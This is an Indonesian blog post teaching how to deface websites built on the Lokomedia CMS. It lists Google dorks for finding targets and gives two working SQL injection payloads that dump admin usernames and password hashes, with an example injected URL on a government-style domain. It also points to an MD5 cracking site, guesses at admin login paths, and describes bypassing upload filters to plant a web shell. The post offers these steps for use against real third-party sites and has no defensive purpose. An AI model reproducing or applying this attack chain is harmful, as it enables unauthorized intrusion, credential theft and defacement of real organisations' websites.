Cara deface metode sql lokomedia 2019

01.37 0 Comments
Share:


Assalamualaikum wr wb. 
kali ini saya mau kasih tutorial deface metode sql lokomedia
Oke langsung ajh ketutorialnya,

 Bahan/Alat:

 1. Dork:

  • inurl:/statis-4/potensi.html
  • inurl:/statis-2/visi-dan-misi.html
  • inurl:/statis-3/strategi-dan-kebijakan.html


 kembangin dork nya apabila tidak vuln

2. Exploit:
'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+
'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+
3. MD5 Decrypter Online

  •       https://hashkiller.co.uk/Cracker/MD5


Tutorial:

 1. Buka searching google, lalu kalian dorking dari dork di atas

 2. Lalu buka salah satu target kalian

 3. Lalu masukan Exploit nya tadi, terserah exploit yang pertama apa kedua

 Contoh: http://blablabla.go.id/statis-3/strategi-dan-kebijakan.html
4. Masukan Exploit nya di akhir kata atau di akhir angka
    saya menggunakan exploit yang peratama

  • http://blablabla.go.id/statis-3'union select /*!50000Concat*/(username,0x20,password)+from+users--+--+/strategi-dan-kebijakan.html

Apabila berhasil contoh nya seperti gambar berikut:
lalu kita buka lewat view-source, contoh nya seperti gambar berikut:
lalu tinggal kita decrypt aja ke md5, cara nya langsung aja ke md5 online diatas yang sudah saya cantumkan.

 tapi sebelum mendecrypt ke md5 mending cari dulu halaman login admin nya, karena pada cms lokomedia ini lumayan susah dicari halaman login nya.
tapi biasanya halaman admin login nya disini:
  • www.targetanda.com/webadmin
  • www.targetanda.com/adminweb
  • www.targetanda.com/redaktur
  • www.targetanda.com/redaksi
  • www.targetanda.com/administrator


 kalau masih belum ketemu juga, kalian bisa searching di google cara mencari halaman atau path admin pada cms lokomedia

 5. Kalau kalian sudah masukan ke halaman admin, kalian tinggal upload poto saja, tapi dengan cara bypass upload menggunakan tamper data di mozilla atau burp suite

 6 Setelah itu kalian tinggal cari akses shell dengan cara, buka halaman tempat dimana kalian mengupload shell tadi lalu klik kanan atau copy image location dan akses shell kalian

nih ya saya kasih tau, mending kalian cari halaman atau path admin nya dulu
percuma kalau udah dapat user admin nya tapi ga dapat halam login, kan hasil nya nol.

cukup tutorial untuk kali ini, kalau saya kurang kata-kata atau ada kata yang tidak cocok mohon di makhlumi dan di maafin karena manusia tidak luput dari kesalahan (:
Tags
Share:

Tidak ada komentar

Langganan: Posting Komentar ( Atom )